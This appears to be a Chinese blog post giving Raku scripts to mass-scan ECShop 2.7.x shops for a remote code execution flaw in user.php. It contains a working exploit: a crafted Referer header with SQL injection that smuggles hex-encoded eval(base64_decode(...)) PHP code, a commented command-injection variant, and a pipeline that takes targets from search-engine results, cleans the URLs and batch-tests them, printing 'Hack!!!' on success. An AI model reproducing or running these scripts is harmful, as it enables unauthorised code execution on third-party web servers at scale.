ecshop 2.7.x 批量测试

 

下面为测试是否存在漏洞的脚本:

sub MAIN($url) {
use HTTP::UserAgent;
my $r = HTTP::Request.new();
$r.uri: $url~'/user.php';
$r.set-method: 'POST';
my $ua = HTTP::UserAgent.new;
$r.add-content("action=login&vulnspy=phpinfo();exit;");
#my %data = :action<login>,'vulnspy' => "`echo 11111 > 1.txt`;exit";
my $exp = '554fcae493e564ee0dc75bdf2ebf94caads|a:3:{s:2:"id";s:3:"\'/*";s:3:"num";s:201:"*/ union select 1,0x272F2A,3,4,5,6,7,8,0x7b247b2476756c6e737079275d3b6576616c2f2a2a2f286261736536345f6465636f646528275a585a686243676b5831425055315262646e5673626e4e77655630704f773d3d2729293b2f2f7d7d,0--";s:4:"name";s:3:"ads";}554fcae493e564ee0dc75bdf2ebf94ca';
#$r.header.field(:User-Agent<Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0>);
#$r.header.field(:Accept<text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8>);
#$r.header.field(:Accept-Language<zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3>);
#$r.header.field(:Accept-Encoding<gzip, deflate>);
$r.header.field(Referer => $exp);
$r.header.field(:Content-Type<application/x-www-form-urlencoded>);
#$r.add-form-data(%data);
#say $r.Str;
#exit;
my $html = $ua.request($r);
#say $r.Str;
#say $html.^methods;
if so $html.content ~~ /:i phpinfo/ {say 'True'};
}

为 True 时表示存在漏洞。

关键字查找可以用这个脚本:

 必应关键字查找

查找结果后处理 URL 可以用如下脚本:

my $file = open '1.txt', :r;
my $get_url = open 'url.txt', :a;
for $file.lines {
      if not so $_ ~~ /\// {
        .say;
        $get_url.say($_);
        next;
      }
      if  so $_ ~~ /^http/ {
        $_ ~~ /(http.*\/\/.*?)\//;
        my $swap = $/[0].Str;
        say $swap;
        $get_url.say($swap);
        next;
      }
      if so $_ ~~ /(.*?)\/.*/ {
        my $swap = $/[0].Str;
      say $swap;
      $get_url.say($swap);
    }
}

把以上处理过的文本导入进行批量检测最终脚本为:

use HTTP::UserAgent;
my $r = HTTP::Request.new();
my $file = open 'url.txt', :r;
my $target;
my $ua = HTTP::UserAgent.new;
for $file.lines -> $url {

      $r.clear;#清除所有头信息
      if $url ~~ /^http/ {
        $target = $url~'/user.php';
        $r.uri: $target;
      } else {
        $target = 'http://'~$url~'/user.php';
        $r.uri: $target;
      }
      say 'Check url: '~$target;
      TEST($target);

  }

sub TEST($url) {
    use HTTP::UserAgent;
    my $r = HTTP::Request.new();
    $r.uri: $url~'/user.php';
    $r.set-method: 'POST';
    my $ua = HTTP::UserAgent.new;
    $ua.timeout = 10;
    $r.add-content("action=login&vulnspy=phpinfo();exit;");
    my $exp = '554fcae493e564ee0dc75bdf2ebf94caads|a:3:{s:2:"id";s:3:"\'/*";s:3:"num";s:201:"*/ union select 1,0x272F2A,3,4,5,6,7,8,0x7b247b2476756c6e737079275d3b6576616c2f2a2a2f286261736536345f6465636f646528275a585a686243676b5831425055315262646e5673626e4e77655630704f773d3d2729293b2f2f7d7d,0--";s:4:"name";s:3:"ads";}554fcae493e564ee0dc75bdf2ebf94ca';

    $r.header.field(Referer => $exp);
    $r.header.field(:Content-Type<application/x-www-form-urlencoded>);

    try {
          # code goes in here
          # 如果有东西出错, 脚本会进入到下面的 CATCH block 中
          # 如果什么错误也没有, 那么 CATCH block 会被忽略
                my $html = $ua.request($r);
                #say $r.Str;
                #say $html.^methods;
                if so $html.content ~~ /:i phpinfo/ {
                  say 'Hack!!! ';
                } else {say 'No'}
          CATCH {
              default {
                # 只有抛出异常时, 这儿的代码才会被求值
                say 'Error';
              }
            }
        }

}

注意:

当打印结果为 Error 时， 可能是爬虫出问题， 或者是 url 链接无法打开。如果有这情况请进行手工测试。

漏洞说明链接为:

ECShop <= 2.7.x/3.6.x 全系列版本远程代码执行高危漏洞EXP